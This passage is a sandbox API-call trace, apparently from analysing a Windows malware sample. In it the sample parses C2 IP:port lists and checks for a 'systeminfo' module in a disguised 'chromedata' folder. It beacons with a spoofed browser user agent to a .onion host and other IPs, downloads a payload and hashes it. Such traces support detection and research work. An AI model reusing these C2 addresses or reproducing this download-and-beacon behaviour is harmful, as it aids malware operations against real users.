	[0119.124] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.124] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.124] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23077d0
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.124] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.124] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307550, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=19 | out: lpWideCharStr="95.213.203.228:447") returned 19
	[0119.124] StrStrIW (lpFirst="95.213.203.228:447", lpSrch=":") returned=":447"
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.124] lstrcpynW (in: lpString1=0x23075a0, lpString2="95.213.203.228:447", iMaxLength=15 | out: lpString1="95.213.203.228") returned="95.213.203.228"
	[0119.124] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.124] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad300, Size=0x10) returned 0x22ad2e8
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.124] lstrcpynW (in: lpString1=0x22ad300, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23077f8
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.124] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307578, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0119.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.124] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307578, cbMultiByte=-1, lpWideCharStr=0x22a5bd0, cchWideChar=19 | out: lpWideCharStr="195.123.213.17:447") returned 19
	[0119.124] StrStrIW (lpFirst="195.123.213.17:447", lpSrch=":") returned=":447"
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23075a0
	[0119.125] lstrcpynW (in: lpString1=0x23075a0, lpString2="195.123.213.17:447", iMaxLength=15 | out: lpString1="195.123.213.17") returned="195.123.213.17"
	[0119.125] StrStrIW (lpFirst="447", lpSrch=":") returned 0x0
	[0119.125] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad2e8, Size=0x10) returned 0x22ad300
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.125] lstrcpynW (in: lpString1=0x22ad2e8, lpString2="447", iMaxLength=4 | out: lpString1="447") returned="447"
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307820
	[0119.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0119.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23075a0) returned 1
	[0119.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad300) returned 1
	[0119.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa018
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad300
	[0119.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x261e88) returned 1
	[0119.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294d0 | out: lpSystemTimeAsFileTime=0x1294d0*(dwLowDateTime=0x30cf2a80, dwHighDateTime=0x1d50a6a)) 
	[0119.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eb8e8) returned 1
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0119.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.125] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ee0
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22a79a8
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f18
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f50
	[0119.126] StrStrIW (lpFirst="systeminfo sTart", lpSrch=" ") returned=" sTart"
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad330
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307898
	[0119.126] lstrcpynW (in: lpString1=0x2307898, lpString2="systeminfo sTart", iMaxLength=11 | out: lpString1="systeminfo") returned="systeminfo"
	[0119.126] StrStrIW (lpFirst="sTart", lpSrch=" ") returned 0x0
	[0119.126] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad330, Size=0x10) returned 0x22ad348
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad330
	[0119.126] lstrcpynW (in: lpString1=0x22ad330, lpString2="sTart", iMaxLength=6 | out: lpString1="sTart") returned="sTart"
	[0119.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad360
	[0119.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x22ad360, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sTart", lpUsedDefaultChar=0x0) returned 6
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0119.126] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0119.126] lstrcmpiW (lpString1="sTart", lpString2="start") returned 0
	[0119.126] lstrcmpiW (lpString1="sTart", lpString2="release") returned 1
	[0119.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0119.127] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0119.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0119.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x279a30
	[0119.127] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x279a30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0119.127] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32")) returned 0xffffffff
	[0119.127] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x279a30) returned 1
	[0119.127] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4dc0
	[0119.127] WinHttpConnect (hSession=0x22c4dc0, pswzServerName="cd4fhnyg2337dgxk.onion", nServerPort=0x1c0, dwReserved=0x0) returned 0x22c4ea8
	[0119.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5fc0
	[0119.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6ff0
	[0119.127] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0119.127] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x22eb8e8
	[0119.127] WinHttpSendRequest (hRequest=0x22eb8e8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 0
	[0119.131] Sleep (dwMilliseconds=0x3e8) 
	[0120.136] WinHttpCloseHandle (hInternet=0x22eb8e8) returned 1
	[0120.136] Sleep (dwMilliseconds=0x4e20) 
	[0130.152] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6ff0) returned 1
	[0130.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ab8
	[0130.153] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0130.153] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x22ca8e0
	[0130.153] WinHttpSendRequest (hRequest=0x22ca8e0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 0
	[0130.158] Sleep (dwMilliseconds=0x3e8) 
	[0131.167] WinHttpCloseHandle (hInternet=0x22ca8e0) returned 1
	[0131.167] Sleep (dwMilliseconds=0x4e20) 
	[0141.181] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ab8) returned 1
	[0141.181] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ab8
	[0141.181] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0141.181] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x22ca8e0
	[0141.182] WinHttpSendRequest (hRequest=0x22ca8e0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 0
	[0141.184] Sleep (dwMilliseconds=0x3e8) 
	[0142.195] WinHttpCloseHandle (hInternet=0x22ca8e0) returned 1
	[0142.195] Sleep (dwMilliseconds=0x4e20) 
	[0152.210] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0152.210] WinHttpConnect (hSession=0x22c4dc0, pswzServerName="5.188.108.22", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c4ea8
	[0152.210] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8d68
	[0152.210] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ab8) returned 1
	[0152.210] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22a9e60
	[0152.211] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0152.211] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22ca8e0
	[0152.211] WinHttpSetOption (hInternet=0x22ca8e0, dwOption=0x1f, lpBuffer=0x128240, dwBufferLength=0x4) returned 1
	[0152.211] WinHttpSendRequest (hRequest=0x22ca8e0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0153.384] WinHttpReceiveResponse (hRequest=0x22ca8e0, lpReserved=0x0) returned 1
	[0153.385] WinHttpQueryHeaders (in: hRequest=0x22ca8e0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128230, lpdwBufferLength=0x12822c, lpdwIndex=0x0 | out: lpBuffer=0x128230*, lpdwBufferLength=0x12822c*=0x4, lpdwIndex=0x0) returned 1
	[0153.385] WinHttpQueryDataAvailable (in: hRequest=0x22ca8e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0xee5) returned 1
	[0153.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x22d68d0
	[0153.385] WinHttpReadData (in: hRequest=0x22ca8e0, lpBuffer=0x22d68d0, dwNumberOfBytesToRead=0xee5, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x22d68d0*, lpdwNumberOfBytesRead=0x12822c*=0xee5) returned 1
	[0153.385] WinHttpQueryDataAvailable (in: hRequest=0x22ca8e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0153.385] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22d68d0, Size=0x2ef0) returned 0x263ed8
	[0153.385] WinHttpReadData (in: hRequest=0x22ca8e0, lpBuffer=0x264dbd, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x264dbd*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0153.386] WinHttpQueryDataAvailable (in: hRequest=0x22ca8e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x101c) returned 1
	[0153.386] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x263ed8, Size=0x3f10) returned 0x272c4c8
	[0153.386] WinHttpReadData (in: hRequest=0x22ca8e0, lpBuffer=0x272f3ad, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x272f3ad*, lpdwNumberOfBytesRead=0x12822c*=0x101c) returned 1
	[0153.386] WinHttpQueryDataAvailable (in: hRequest=0x22ca8e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x1af) returned 1
	[0153.386] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x272c4c8, Size=0x40b0) returned 0x272c4c8
	[0153.386] WinHttpReadData (in: hRequest=0x22ca8e0, lpBuffer=0x27303c9, dwNumberOfBytesToRead=0x1af, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27303c9*, lpdwNumberOfBytesRead=0x12822c*=0x1af) returned 1
	[0153.386] WinHttpQueryDataAvailable (in: hRequest=0x22ca8e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x0) returned 1
	[0153.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac150
	[0153.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2730580
	[0153.387] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.388] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.388] CryptHashData (hHash=0x22e5a98, pbData=0x2730580, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0153.388] CryptGetHashParam (in: hHash=0x22e5a98, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307c58
	[0153.388] CryptGetHashParam (in: hHash=0x22e5a98, dwParam=0x2, pbData=0x2307c58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307c58, pdwDataLen=0x128aac) returned 1
	[0153.388] CryptDestroyHash (hHash=0x22e5a98) returned 1
	[0153.388] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.388] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.388] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.388] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0153.388] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307bb8
	[0153.388] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307bb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307bb8, pdwDataLen=0x128aac) returned 1
	[0153.388] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.388] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.388] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.389] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.389] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0153.389] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.389] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307c08
	[0153.389] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307c08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307c08, pdwDataLen=0x128aac) returned 1
	[0153.389] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.389] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.389] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.390] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.390] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0153.390] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307c30
	[0153.390] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307c30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307c30, pdwDataLen=0x128aac) returned 1
	[0153.390] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.390] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.390] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.390] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.390] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0153.390] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d70
	[0153.390] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307d70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307d70, pdwDataLen=0x128aac) returned 1
	[0153.390] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.390] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.390] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.391] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.391] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0153.391] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307dc0
	[0153.391] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307dc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307dc0, pdwDataLen=0x128aac) returned 1
	[0153.391] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.391] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.391] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.391] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.391] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0153.391] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307e10
	[0153.391] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307e10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307e10, pdwDataLen=0x128aac) returned 1
	[0153.391] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.391] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.392] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.392] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.392] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0153.392] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307e38
	[0153.392] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307e38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307e38, pdwDataLen=0x128aac) returned 1
	[0153.392] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.392] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.392] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.393] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.393] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0153.393] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307e60
	[0153.393] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307e60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307e60, pdwDataLen=0x128aac) returned 1
	[0153.393] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.393] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.393] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.393] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.393] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x140, dwFlags=0x0) returned 1
